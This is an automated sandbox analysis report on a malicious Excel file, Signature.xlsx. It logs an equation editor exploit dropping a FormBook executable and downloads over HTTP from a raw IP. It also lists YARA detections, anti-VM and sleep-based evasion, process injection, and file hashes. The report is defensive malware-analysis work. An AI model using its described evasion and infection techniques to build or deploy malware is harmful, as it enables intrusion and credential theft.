Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 18.194.54.219:80

Networking:

Downloads executable code via HTTP

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219
Source: unknown	TCP traffic detected without corresponding DNS query: 18.194.54.219

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B891E.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, vbc.exe, 00000005.00000002.2157599757.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000006.00000002.2158308519.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000007.00000002.2159068648.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2159827958.0000000000212000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2161125989.0000000000212000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: http://thesnake.herokuapp.com/snakes
Source: E74B891E.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3519	4_2_003A3519
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3808	4_2_003A3808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADA91	4_2_003ADA91
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A3AC0	4_2_003A3AC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ABAC0	4_2_003ABAC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57E0	4_2_003A57E0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A57DD	4_2_003A57DD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A5A38	4_2_003A5A38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003ADAD2	4_2_003ADAD2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003A8D46	4_2_003A8D46

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Signature.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: hm1[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@14/6@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Signature.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR59B.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Signature.xlsx

Static file information: File size 2493440 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Signature.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Signature.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929
Source: initial sample	Static PE information: section name: .text entropy: 7.41524464929

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Signature.xlsx

Stream path 'EncryptedPackage' entropy: 7.99993201198 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2852, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1980	Thread sleep time: -52785s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2162212987.00000000020D1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000004.00000002.2162537500.00000000030D9000.00000004.00000001.sdmp, type: MEMORY

ID:	345177
Product:	CloudBasic
Start time:	20:01:38
Start date:	27.01.2021
Sample:	Signature.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	560a48512736572ec4abceb4ecf22250
SHA1:	56798f4c080101515e42b5678a2039ac6b8caaf3
SHA256:	1d93a4fcbcf81b40332da7aedaa9288ca16a2c0c588db5c78c6e349ce53478d4
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hm1[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BE84C387975B024F25DC96EC5F85F7BD	58507DE0E96B77F8030A4DC5BC607C438E14D5DA	EBBCC767ACC5337309A6F0770C52236B131CBCFFB3E843E4BF132489CB2001CC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B65EA87.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86CDB2DC.jpeg	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3	AA7A56E6A97FFA9390DA10A2EC0C5805	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B891E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8BA96E01E5E31685B576653500058F22	03DCFA79713728B83AB0337CA70BA73715758B9A	130D78C8E1A21DF3B25FE4461EFA7B13F505DCE5B6FDB51D982EE04181420C88
C:\Users\user\Desktop\~$Signature.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	BE84C387975B024F25DC96EC5F85F7BD	58507DE0E96B77F8030A4DC5BC607C438E14D5DA	EBBCC767ACC5337309A6F0770C52236B131CBCFFB3E843E4BF132489CB2001CC

Analysis Report Signature.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs